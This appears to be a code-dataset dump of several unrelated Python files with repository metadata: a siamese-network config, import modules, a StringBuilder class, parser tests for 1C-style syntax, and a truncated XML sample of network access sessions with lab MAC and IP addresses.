| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
187b4be1e6f2d3982a2964b04d58f6067948143e
| 290
|
py
|
Python
|
siamese-net/config.py
|
Nikdevelop/siamese_net
|
1a40bc56184c76a85f2d10054a358a3c9821a87f
|
[
"MIT"
] | 27
|
2020-10-20T10:06:04.000Z
|
2022-03-04T16:42:56.000Z
|
siamese-net/config.py
|
Nikdevelop/siamese_net
|
1a40bc56184c76a85f2d10054a358a3c9821a87f
|
[
"MIT"
] | 4
|
2021-06-27T09:23:26.000Z
|
2022-02-01T14:58:49.000Z
|
siamese-net/config.py
|
Nikdevelop/siamese_net
|
1a40bc56184c76a85f2d10054a358a3c9821a87f
|
[
"MIT"
] | 12
|
2020-10-02T18:05:51.000Z
|
2022-02-06T17:25:33.000Z
|
# Configuration for the signature-verification siamese network.
# NOTE(review): these are Google-Colab Drive mount paths — adjust when
# running outside Colab.
training_dir = "/content/drive/My Drive/data/sign_data/train"
training_csv = "/content/drive/My Drive/data/sign_data/train_data.csv"
testing_csv = "/content/drive/My Drive/data/sign_data/test_data.csv"
testing_dir = "/content/drive/My Drive/data/sign_data/test"
batch_size = 32  # samples per training batch
epochs = 20  # number of training epochs
| 41.428571
| 70
| 0.786207
| 49
| 290
| 4.428571
| 0.326531
| 0.221198
| 0.258065
| 0.35023
| 0.709677
| 0.709677
| 0.709677
| 0.709677
| 0
| 0
| 0
| 0.014925
| 0.075862
| 290
| 6
| 71
| 48.333333
| 0.794776
| 0
| 0
| 0
| 0
| 0
| 0.662069
| 0.413793
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
a13655df17b7fcd607fc65bf6c003511463dea2e
| 247
|
py
|
Python
|
cqi_cpp/src/wrapper/__init__.py
|
AMR-/Conservative-Q-Improvement
|
f9d47b33fe757475d3216d3c406d147206738c90
|
[
"MIT"
] | null | null | null |
cqi_cpp/src/wrapper/__init__.py
|
AMR-/Conservative-Q-Improvement
|
f9d47b33fe757475d3216d3c406d147206738c90
|
[
"MIT"
] | null | null | null |
cqi_cpp/src/wrapper/__init__.py
|
AMR-/Conservative-Q-Improvement
|
f9d47b33fe757475d3216d3c406d147206738c90
|
[
"MIT"
] | null | null | null |
from cqi_cpp.src.wrapper.qtree_wrapper import PyQTree
from cqi_cpp.src.wrapper.qtree_wrapper import PyBox as Box
from cqi_cpp.src.wrapper.qtree_wrapper import PyDiscrete as Discrete
from cqi_cpp.src.wrapper.qtree_wrapper import PyVector as Vector
| 49.4
| 68
| 0.862348
| 42
| 247
| 4.880952
| 0.357143
| 0.136585
| 0.195122
| 0.253659
| 0.741463
| 0.741463
| 0.741463
| 0.741463
| 0
| 0
| 0
| 0
| 0.089069
| 247
| 4
| 69
| 61.75
| 0.911111
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 9
|
a13c8c507331e73e19ff5cc6adf8284db751763c
| 198
|
py
|
Python
|
wtoolzargs/common/utils.py
|
e-k-m/wtoolzargs
|
edd1e932852aee1e8b56eb8e09739b7f48c638b6
|
[
"MIT"
] | null | null | null |
wtoolzargs/common/utils.py
|
e-k-m/wtoolzargs
|
edd1e932852aee1e8b56eb8e09739b7f48c638b6
|
[
"MIT"
] | null | null | null |
wtoolzargs/common/utils.py
|
e-k-m/wtoolzargs
|
edd1e932852aee1e8b56eb8e09739b7f48c638b6
|
[
"MIT"
] | null | null | null |
class StringBuilder(object):
    """Accumulates text in ``self.s`` and supports chained ``append`` calls."""

    def __init__(self, s=""):
        # Start the buffer with an optional initial string.
        self.s = s

    def append(self, s):
        """Concatenate *s* onto the buffer and return self for chaining."""
        self.s += s
        return self

    def __str__(self):
        """Return the accumulated string."""
        return self.s
| 18
| 29
| 0.535354
| 27
| 198
| 3.62963
| 0.37037
| 0.306122
| 0.27551
| 0.306122
| 0.22449
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.343434
| 198
| 10
| 30
| 19.8
| 0.753846
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.375
| false
| 0
| 0
| 0.125
| 0.75
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
a1a90367560c293edac4dd02517185f9a3126fbd
| 3,074
|
py
|
Python
|
tests/test_parser/test_module.py
|
vbondarevsky/ones_analyzer
|
ab8bff875192db238ed17c20d61c9fa5b55c3fa8
|
[
"MIT"
] | 12
|
2017-11-23T07:04:13.000Z
|
2022-03-01T21:06:56.000Z
|
tests/test_parser/test_module.py
|
vbondarevsky/analyzer_test
|
ab8bff875192db238ed17c20d61c9fa5b55c3fa8
|
[
"MIT"
] | 2
|
2017-06-25T21:32:32.000Z
|
2017-11-19T19:05:40.000Z
|
tests/test_parser/test_module.py
|
vbondarevsky/analyzer_test
|
ab8bff875192db238ed17c20d61c9fa5b55c3fa8
|
[
"MIT"
] | 5
|
2017-11-21T08:24:56.000Z
|
2021-08-17T23:21:18.000Z
|
from analyzer.syntax_kind import SyntaxKind
from tests.utils import TestCaseParser
class TestParserModule(TestCaseParser):
    """Parser tests for top-level module structure.

    Each test parses a source snippet and checks which of the three module
    sections (declarations, methods, statements) were produced in the
    syntax tree. NOTE(review): the fixtures appear to be 1C:Enterprise (BSL)
    code — "Перем" = Var, "Процедура"/"КонецПроцедуры" =
    Procedure/EndProcedure, "Функция"/"КонецФункции" = Function/EndFunction
    — presumed from the keywords; confirm against the analyzer's lexer.
    """
    # An empty module produces empty declarations, methods and statements.
    def test_empty(self):
        self.parse_source("")
        self.assertNode(self.syntax_tree.declarations, [])
        self.assertNode(self.syntax_tree.methods, [])
        self.assertNode(self.syntax_tree.statements, [])
    # A single variable declaration fills only the declarations section.
    def test_declarations(self):
        self.parse_source("Перем А")
        self.assertNode(self.syntax_tree.declarations, [SyntaxKind.VariableDeclaration])
        self.assertNode(self.syntax_tree.methods, [])
        self.assertNode(self.syntax_tree.statements, [])
    # A procedure and a function fill only the methods section.
    def test_methods(self):
        code = \
            """Процедура МояПроцедура()
            КонецПроцедуры
            Функция МояФункция()
            КонецФункции"""
        self.parse_source(code)
        self.assertNode(self.syntax_tree.declarations, [])
        self.assertNode(self.syntax_tree.methods, [SyntaxKind.ProcedureBlock, SyntaxKind.FunctionBlock])
        self.assertNode(self.syntax_tree.statements, [])
    # An expression statement fills only the statements section; its
    # trailing semicolon is kept as a token on the statement node.
    def test_statements(self):
        self.parse_source("А=8+2;")
        self.assertNode(self.syntax_tree.declarations, [])
        self.assertNode(self.syntax_tree.methods, [])
        self.assertNode(self.syntax_tree.statements, [SyntaxKind.ExpressionStatement])
        self.assertNode(self.syntax_tree.statements[0].semicolon_token, SyntaxKind.SemicolonToken)
    # Declarations followed by a method populate both sections.
    def test_declarations_and_methods(self):
        code = \
            """Перем А;
            Процедура МояПроцедура()
            КонецПроцедуры"""
        self.parse_source(code)
        self.assertNode(self.syntax_tree.declarations, [SyntaxKind.VariableDeclaration])
        self.assertNode(self.syntax_tree.methods, [SyntaxKind.ProcedureBlock])
        self.assertNode(self.syntax_tree.statements, [])
    # Declarations followed by a statement populate both sections.
    def test_declarations_and_statements(self):
        code = \
            """Перем А;
            А=8"""
        self.parse_source(code)
        self.assertNode(self.syntax_tree.declarations, [SyntaxKind.VariableDeclaration])
        self.assertNode(self.syntax_tree.methods, [])
        self.assertNode(self.syntax_tree.statements, [SyntaxKind.ExpressionStatement])
    # A method followed by a statement populates both sections.
    def test_methods_and_statements(self):
        code = \
            """Процедура МояПроцедура()
            КонецПроцедуры
            А=8"""
        self.parse_source(code)
        self.assertNode(self.syntax_tree.declarations, [])
        self.assertNode(self.syntax_tree.methods, [SyntaxKind.ProcedureBlock])
        self.assertNode(self.syntax_tree.statements, [SyntaxKind.ExpressionStatement])
    # All three sections populated at once.
    def test_declarations_and_methods_and_statements(self):
        code = \
            """Перем А;
            Процедура МояПроцедура()
            КонецПроцедуры
            А=8"""
        self.parse_source(code)
        self.assertNode(self.syntax_tree.declarations, [SyntaxKind.VariableDeclaration])
        self.assertNode(self.syntax_tree.methods, [SyntaxKind.ProcedureBlock])
        self.assertNode(self.syntax_tree.statements, [SyntaxKind.ExpressionStatement])
| 40.986667
| 104
| 0.675992
| 303
| 3,074
| 6.683168
| 0.138614
| 0.17284
| 0.222222
| 0.296296
| 0.855309
| 0.795062
| 0.756543
| 0.725432
| 0.70321
| 0.687901
| 0
| 0.002488
| 0.215355
| 3,074
| 74
| 105
| 41.540541
| 0.837065
| 0
| 0
| 0.673469
| 0
| 0
| 0.004844
| 0
| 0
| 0
| 0
| 0
| 0.510204
| 1
| 0.163265
| false
| 0
| 0.040816
| 0
| 0.22449
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
a1ff629a976514830820808e4c2bf18ea78653d8
| 175
|
py
|
Python
|
utilities/prev_projects/DATAFIT/VIEW/CANVAS/__init__.py
|
Saldenisov/pyconlyse
|
1de301b4a4c15ee0bd19034aa8d5da1beacfd124
|
[
"MIT"
] | null | null | null |
utilities/prev_projects/DATAFIT/VIEW/CANVAS/__init__.py
|
Saldenisov/pyconlyse
|
1de301b4a4c15ee0bd19034aa8d5da1beacfd124
|
[
"MIT"
] | null | null | null |
utilities/prev_projects/DATAFIT/VIEW/CANVAS/__init__.py
|
Saldenisov/pyconlyse
|
1de301b4a4c15ee0bd19034aa8d5da1beacfd124
|
[
"MIT"
] | null | null | null |
from .MyMplCanvas import *
from .MyMplCanvas import MyMplCanvas
from .DataCanvas import *
from .FitCanvas import *
from .KineticsCanvas import *
from .SpectrumCanvas import *
| 25
| 36
| 0.8
| 19
| 175
| 7.368421
| 0.368421
| 0.285714
| 0.3
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.137143
| 175
| 6
| 37
| 29.166667
| 0.927152
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
62a8ed0ff1849e2b2cd20eddae9aef290321d76a
| 71,710
|
py
|
Python
|
api/activelist.py
|
kecorbin/isemon
|
af4ac5ab70c61733ef20b793d390ca8bfa0c800d
|
[
"MIT"
] | 3
|
2018-08-21T21:45:22.000Z
|
2021-01-07T03:16:54.000Z
|
api/activelist.py
|
kecorbin/isemon
|
af4ac5ab70c61733ef20b793d390ca8bfa0c800d
|
[
"MIT"
] | 1
|
2021-12-13T19:46:27.000Z
|
2021-12-13T19:46:27.000Z
|
api/activelist.py
|
kecorbin/isemon
|
af4ac5ab70c61733ef20b793d390ca8bfa0c800d
|
[
"MIT"
] | 1
|
2018-09-12T16:10:14.000Z
|
2018-09-12T16:10:14.000Z
|
xmlstr = """<?xml version="1.0" encoding="UTF-8" standalone="yes"?><activeList noOfActiveSession="245"><activeSession><user_name>00:11:BB:E2:C4:E4</user_name><calling_station_id>00:11:BB:E2:C4:E4</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>000000A0</acct_session_id><server>web</server><framed_ip_address>10.0.1.31</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:00:AA:AD:71:48</user_name><calling_station_id>00:00:AA:AD:71:48</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.22</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>D8:EB:97:9B:E2:C1</user_name><calling_station_id>D8:EB:97:9B:E2:C1</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.22</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:9D:78:22</user_name><calling_station_id>00:11:BB:9D:78:22</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.21</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:1A:66:00:00:00</user_name><calling_station_id>00:1A:66:00:00:00</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.13</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:D1:82:15</user_name><calling_station_id>00:11:BB:D1:82:15</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.10</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>D8:EB:97:65:90:5F</user_name><calling_station_id>D8:EB:97:65:90:5F</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>0000002E</acct_session_id><server>web</server><framed_ip_address>10.0.1.48</frame
d_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:5B:F0:AD</user_name><calling_station_id>00:11:BB:5B:F0:AD</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.49</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:8A:78:50</user_name><calling_station_id>00:11:BB:8A:78:50</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.42</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:49:24:B1</user_name><calling_station_id>00:11:BB:49:24:B1</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.34</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:21:2D:00:00:00</user_name><calling_station_id>00:21:2D:00:00:00</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.32</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>D8:EB:97:B7:6F:D5</user_name><calling_station_id>D8:EB:97:B7:6F:D5</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.38</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:00:AA:02:DD:25</user_name><calling_station_id>00:00:AA:02:DD:25</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.33</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:23:E4:49</user_name><calling_station_id>00:11:BB:23:E4:49</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.27</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>D8:EB:97:D9:25:CE</user_name><calling_station_id>D8:EB:97:D9:
25:CE</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000069</acct_session_id><server>web</server><framed_ip_address>10.0.1.15</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:CB:E3:01</user_name><calling_station_id>00:11:BB:CB:E3:01</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.12</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>5C:38:E0:00:00:00</user_name><calling_station_id>5C:38:E0:00:00:00</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.59</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:B0:56:02</user_name><calling_station_id>00:11:BB:B0:56:02</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.3</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:34:D1:13</user_name><calling_station_id>00:11:BB:34:D1:13</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.54</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:00:AA:73:A6:42</user_name><calling_station_id>00:00:AA:73:A6:42</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.56</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:09:C7:55</user_name><calling_station_id>00:11:BB:09:C7:55</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.49</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:9A:BD:D8</user_name><calling_station_id>00:11:BB:9A:BD:D8</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><fr
amed_ip_address>10.0.1.44</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>D8:EB:97:AA:62:C1</user_name><calling_station_id>D8:EB:97:AA:62:C1</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.45</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:E8:06:7E</user_name><calling_station_id>00:11:BB:E8:06:7E</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.34</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:00:AA:05:7C:F4</user_name><calling_station_id>00:00:AA:05:7C:F4</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.28</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>D8:EB:97:47:34:D3</user_name><calling_station_id>D8:EB:97:47:34:D3</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.28</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:08:34:E9</user_name><calling_station_id>00:11:BB:08:34:E9</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.27</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>18:26:66:00:00:00</user_name><calling_station_id>18:26:66:00:00:00</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.22</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:F8:AC:8A</user_name><calling_station_id>00:11:BB:F8:AC:8A</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.19</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>D8:EB:97:E5:D8:BE</user_name>
<calling_station_id>D8:EB:97:E5:D8:BE</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.13</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:4A:90:F5</user_name><calling_station_id>00:11:BB:4A:90:F5</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.8</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:CA:2D:6F</user_name><calling_station_id>00:11:BB:CA:2D:6F</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.9</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:19:F5:00:00:00</user_name><calling_station_id>00:19:F5:00:00:00</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.3</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:00:AA:96:4B:C8</user_name><calling_station_id>00:00:AA:96:4B:C8</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.3</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>D8:EB:97:00:DD:B7</user_name><calling_station_id>D8:EB:97:00:DD:B7</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.158</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:6E:D6:A2</user_name><calling_station_id>00:11:BB:6E:D6:A2</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.160</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:96:B0:14</user_name><calling_station_id>00:11:BB:96:B0:14</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>000000B4</acct_ses
sion_id><server>web</server><framed_ip_address>10.0.1.149</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>D8:EB:97:88:28:D5</user_name><calling_station_id>D8:EB:97:88:28:D5</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.140</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:CB:70:82</user_name><calling_station_id>00:11:BB:CB:70:82</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.139</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:D0:5B:00:00:00</user_name><calling_station_id>00:D0:5B:00:00:00</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.130</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:AE:5B:66</user_name><calling_station_id>00:11:BB:AE:5B:66</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.129</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>D8:EB:97:64:22:DD</user_name><calling_station_id>D8:EB:97:64:22:DD</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.123</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:DA:28:63</user_name><calling_station_id>00:11:BB:DA:28:63</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.123</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:00:AA:D1:65:F7</user_name><calling_station_id>00:00:AA:D1:65:F7</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.122</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><
user_name>D8:EB:97:75:65:C7</user_name><calling_station_id>D8:EB:97:75:65:C7</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.113</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:19:E3:00:00:00</user_name><calling_station_id>00:19:E3:00:00:00</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.111</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:8B:05:B2</user_name><calling_station_id>00:11:BB:8B:05:B2</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.112</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:87:7E:F6</user_name><calling_station_id>00:11:BB:87:7E:F6</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.105</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:00:AA:40:2D:7B</user_name><calling_station_id>00:00:AA:40:2D:7B</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000024</acct_session_id><server>web</server><framed_ip_address>10.0.1.96</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>B4:B0:17:00:00:00</user_name><calling_station_id>B4:B0:17:00:00:00</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.87</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:8F:A3:FA</user_name><calling_station_id>00:11:BB:8F:A3:FA</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.85</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:63:C9:36</user_name><calling_station_id>00:11:BB:63:C9:36</calling_stati
on_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.74</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>D8:EB:97:E1:EA:BF</user_name><calling_station_id>D8:EB:97:E1:EA:BF</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.75</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:06:45:00:00:00</user_name><calling_station_id>00:06:45:00:00:00</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.60</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:00:AA:7D:E8:42</user_name><calling_station_id>00:00:AA:7D:E8:42</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.53</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:BD:0D:1C</user_name><calling_station_id>00:11:BB:BD:0D:1C</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.56</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>D8:EB:97:06:8C:83</user_name><calling_station_id>D8:EB:97:06:8C:83</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.58</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:61:69:94</user_name><calling_station_id>00:11:BB:61:69:94</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.37</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>D8:EB:97:49:C7:90</user_name><calling_station_id>D8:EB:97:49:C7:90</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.35</framed_ip_address><framed_ipv6_addr
ess/></activeSession><activeSession><user_name>00:11:BB:4E:FB:7B</user_name><calling_station_id>00:11:BB:4E:FB:7B</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>000000F9</acct_session_id><server>web</server><framed_ip_address>10.0.1.25</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>AC:34:CB:00:00:00</user_name><calling_station_id>AC:34:CB:00:00:00</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.24</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:C7:06:B5</user_name><calling_station_id>00:11:BB:C7:06:B5</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.16</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>1C:3A:4F:00:00:00</user_name><calling_station_id>1C:3A:4F:00:00:00</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.5</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:91:CD:05</user_name><calling_station_id>00:11:BB:91:CD:05</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.8</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:C0:77:D5</user_name><calling_station_id>00:11:BB:C0:77:D5</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000044</acct_session_id><server>web</server><framed_ip_address>10.0.1.76</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:00:AA:E3:9E:72</user_name><calling_station_id>00:00:AA:E3:9E:72</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><server>web</server><framed_ip_address>10.0.1.67</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>D8:EB:9
